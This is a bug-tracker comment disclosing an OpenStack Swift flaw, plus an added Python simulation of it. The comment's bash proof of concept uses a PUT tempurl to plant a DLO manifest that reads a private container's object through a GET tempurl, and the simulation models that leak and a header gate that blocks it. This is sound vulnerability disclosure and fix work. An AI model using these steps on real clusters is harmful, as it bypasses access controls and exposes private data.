Comment 7 for bug 1453948

clayg (clay-gerrard) wrote: Re: all PUT tempurls leak existence via DLO manifest attack

sorry, been busy - attached patch for review

Here's some bash that works on a swift-all-in-one to get you started:

    #!/bin/bash
    # resetswift
    set -e
    # victim: an object in a container nobody else has access to
    echo "password" > secret
    swift upload private secret
    # victim: set the account-level tempurl key
    swift post -H 'x-account-meta-temp-url-key: mykey'
    # create a container for people to upload stuff to
    swift post public
    # attacker: "yes hello, can I have a safe place to upload some of my data?"
    PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
    # the PUT tempurl accepts an X-Object-Manifest header, so the "upload" is an
    # empty DLO manifest pointing at the private container
    curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
    # attacker: "oh yes, that data I just uploaded - can I download it please?"
    GET_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_test/public/your-thing mykey)"
    # attacker: only... it's not *MY* data - trolrolrololollolo
    echo ""
    echo "**************************************"
    curl "http://localhost:8080${GET_TEMPURL_SIG}"
    echo ""
    echo "**************************************"
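The following Python is an added example and is not part of the bug report, the attached patch, or Swift's own code. It reproduces offline what the SAIO script above does against a real cluster: the tempurl signing scheme (hex HMAC-SHA1 over `METHOD\nEXPIRES\nPATH`, which is Swift's documented tempurl algorithm), a toy object store with just enough DLO behaviour to show the manifest redirect, and a `block_manifest_on_tempurl_put` gate that refuses `X-Object-Manifest` on a tempurl-authenticated PUT. The `ToyCluster` class, `run_attack`, and the gate are this example's own assumptions about what a fix has to do; they are not a description of the attached patch, which is not reproduced here.

```python
"""Added example, not Swift code: model of the tempurl + DLO manifest leak."""
import hmac
from hashlib import sha1
from urllib.parse import parse_qs, urlencode, urlsplit

ACCOUNT = "/v1/AUTH_test"  # same account path as the SAIO script in the report


def tempurl_sig(key: str, method: str, expires: int, path: str) -> str:
    """Swift tempurl signature: hex HMAC-SHA1 over 'METHOD\\nEXPIRES\\nPATH'."""
    body = f"{method}\n{expires}\n{path}".encode()
    return hmac.new(key.encode(), body, sha1).hexdigest()


def make_tempurl(key: str, method: str, ttl: int, path: str, now: int) -> str:
    """Client side, like `swift tempurl METHOD TTL PATH KEY`: path plus query."""
    expires = now + ttl
    query = urlencode({"temp_url_sig": tempurl_sig(key, method, expires, path),
                       "temp_url_expires": expires})
    return f"{path}?{query}"


def tempurl_authorizes(key: str, method: str, url: str, now: int) -> bool:
    """Server side: signature for this method/path matches and is unexpired."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    try:
        sig = qs["temp_url_sig"][0]
        expires = int(qs["temp_url_expires"][0])
    except (KeyError, ValueError):
        return False
    if now >= expires:
        return False
    return hmac.compare_digest(tempurl_sig(key, method, expires, parts.path), sig)


class ToyCluster:
    """Assumed, simplified store: containers -> {object: (headers, body)}.

    A GET of an object carrying X-Object-Manifest "container/prefix" returns the
    concatenated bodies of matching objects in that container, and (as the bug
    report shows) nothing re-checks whether the caller may read that container.
    """

    def __init__(self, key: str, block_manifest_on_tempurl_put: bool):
        self.key = key
        self.block = block_manifest_on_tempurl_put
        self.containers = {}

    @staticmethod
    def _split(path: str):
        # "/v1/AUTH_test/<container>/<object>" -> (container, object)
        _, container, obj = path[len(ACCOUNT):].split("/", 2)
        return container, obj

    def put(self, url: str, headers: dict, body: bytes, now: int):
        if not tempurl_authorizes(self.key, "PUT", url, now):
            return 401, b""
        # the gate a fix needs (assumption, not the attached patch): a tempurl
        # PUT must not be allowed to turn the object into a DLO manifest
        if self.block and any(h.lower() == "x-object-manifest" for h in headers):
            return 400, b"X-Object-Manifest not allowed on tempurl PUT"
        container, obj = self._split(urlsplit(url).path)
        self.containers.setdefault(container, {})[obj] = (dict(headers), body)
        return 201, b""

    def get(self, url: str, now: int):
        if not tempurl_authorizes(self.key, "GET", url, now):
            return 401, b""
        container, obj = self._split(urlsplit(url).path)
        try:
            headers, body = self.containers[container][obj]
        except KeyError:
            return 404, b""
        manifest = next((v for k, v in headers.items()
                         if k.lower() == "x-object-manifest"), None)
        if manifest is None:
            return 200, body
        seg_container, prefix = manifest.split("/", 1)
        segments = self.containers.get(seg_container, {})
        return 200, b"".join(seg_body for name, (_h, seg_body) in sorted(segments.items())
                             if name.startswith(prefix))


def run_attack(block_manifest_on_tempurl_put: bool):
    """Replays the report's script; returns (status, body) of the final GET."""
    now = 1_000_000  # fixed clock so the run is deterministic
    cluster = ToyCluster("mykey", block_manifest_on_tempurl_put)
    cluster.containers["private"] = {"secret": ({}, b"password\n")}  # constructed
    cluster.containers["public"] = {}
    target = f"{ACCOUNT}/public/your-thing"
    put_url = make_tempurl("mykey", "PUT", 60, target, now)
    status, _ = cluster.put(put_url, {"X-Object-Manifest": "private/secret"}, b"", now)
    if status != 201:
        return status, b""
    get_url = make_tempurl("mykey", "GET", 60, target, now)
    return cluster.get(get_url, now)


if __name__ == "__main__":
    print("without gate:", run_attack(False))  # private body comes back
    print("with gate:   ", run_attack(True))   # PUT refused with 400
```

The signature check itself is not what fails here: both the PUT and the GET are correctly signed for the public path, and the leak comes entirely from the PUT being allowed to store a manifest header that the later GET follows into a container the tempurl never covered. That is why the check belongs on the PUT's headers rather than anywhere in the signing logic.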